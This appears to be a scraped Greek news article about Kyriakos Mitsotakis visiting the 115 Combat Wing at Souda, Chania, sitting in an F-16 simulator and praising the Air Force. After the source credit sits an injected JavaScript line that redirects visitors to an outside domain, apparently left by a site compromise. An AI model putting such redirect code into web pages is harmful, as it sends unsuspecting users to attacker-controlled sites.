Στο πιλοτήριο ενός F16 o Kυριάκος Μητσοτάκης (ΕΙΚΟΝΕΣ)

0
44

 

«Μαραθώνιο» επισκέψεων και επαφών στα Χανιά, πραγματοποιεί από το πρωί της Τετάρτης ο Πρόεδρος της Νέας Δημοκρατίας, στο πλαίσιο της διήμερης περιοδείας του στην Κρήτη.

O κ. Μητσοτάκης επισκέφθηκε την 115 Πτέρυγα Μάχης της Πολεμικής Αεροπορίας συνοδευόμενος από βουλευτές και στελέχη του κόμματος. Εκεί, αφού συνάντησε τον Διοικητή της μονάδας, κάθισε και στην θέση του πιλότου ενός μαχητικού αεροσκάφους στον ειδικό προσομοιωτή πτήσης.

mitsotakis-f16

Αμέσως μετά, έκανε την ακόλουθη δήλωση:

«Με ιδιαίτερη χαρά, επισκέφθηκα, σήμερα, την 115 Πτέρυγα Μάχης στο Ακρωτήρι, στα Χανιά. Για εμένα είναι μία ιδιαίτερη ημέρα, καθώς είχα την ευκαιρία να υπηρετήσω το σύνολο της θητείας μου σε μία Πτέρυγα Μάχης, στην 346 Μοίρα, στην Αγχίαλο.

kir3

Είχα την ευκαιρία και σήμερα να συνομιλήσω με τους χειριστές και το προσωπικό. Να διαπιστώσω, για άλλη μία φορά, την άρτια επιχειρησιακή ετοιμότητα της Πολεμικής μας Αεροπορίας.

Θέλω, στο πρόσωπο των χειριστών, που έχουν την καλοσύνη να με πλαισιώσουν σήμερα, να συγχαρώ όλα τα στελέχη της Πολεμικής Αεροπορίας, τους χειριστές μας, αλλά και όλο το προσωπικό για την πολύ μεγάλη προσπάθεια, την οποία καταβάλλουν, να διασφαλίσουν σε δύσκολους καιρούς την εθνική μας ανεξαρτησία και την εδαφική μας ακεραιότητα.

kir2

Θέλω να γνωρίζουν ότι η Πολιτεία και η Νέα Δημοκρατία θα βρίσκονται πάντα κοντά τους, αναγνωρίζοντας την ιδιαίτερη δυσκολία του εγχειρήματός τους, της δουλειάς τους. Να γνωρίζουν ότι απολαμβάνουν πάντα τον αμέριστο σεβασμό και την εκτίμησή μας.

 

Πηγή:zarpanews.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here